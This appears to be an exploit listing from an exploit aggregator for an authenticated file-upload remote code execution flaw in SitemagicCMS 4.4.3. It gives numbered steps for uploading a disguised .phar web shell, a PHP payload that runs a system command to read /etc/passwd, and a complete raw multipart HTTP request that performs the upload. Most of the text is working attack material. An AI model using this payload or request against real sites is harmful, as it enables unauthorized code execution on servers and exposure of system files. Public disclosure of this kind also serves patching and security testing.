Exploit for SitemagicCMS 4.4.3 Shell Upload

Name: Exploit for SitemagicCMS 4.4.3 Shell Upload
Rating: 5 (133 reviews)
2023-05-24 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172527
#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)  
#Application: SitemagicCMS  
#Version: 4.4.3  
#Bugs: RCE  
#Technology: PHP  
#Vendor URL: https://sitemagic.org/Download.html  
#Software Link: https://github.com/Jemt/SitemagicCMS  
#Date of found: 14-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux   
  
2. Technical Details & POC  
========================================  
steps:   
1. go to content then files   
2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?>  
3. go to http://localhost/SitemagicCMS/files/images/shell.phar  
  
  
  
payload: <?php echo system("cat /etc/passwd"); ?>  
  
  
  
Poc request :  
  
POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1  
Host: localhost  
Content-Length: 492  
Cache-Control: max-age=0  
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: iframe  
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf  
Connection: close  
  
------WebKitFormBoundarywPUsZSbtgJ6nAn8W  
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"  
Content-Type: application/octet-stream  
  
<?php echo system('cat /etc/passwd'); ?>  
  
------WebKitFormBoundarywPUsZSbtgJ6nAn8W  
Content-Disposition: form-data; name="SMPostBackControl"  
  
  
------WebKitFormBoundarywPUsZSbtgJ6nAn8W  
Content-Disposition: form-data; name="SMRequestToken"  
  
60a7a113cf94842a197912273825b421  
------WebKitFormBoundarywPUsZSbtgJ6nAn8W--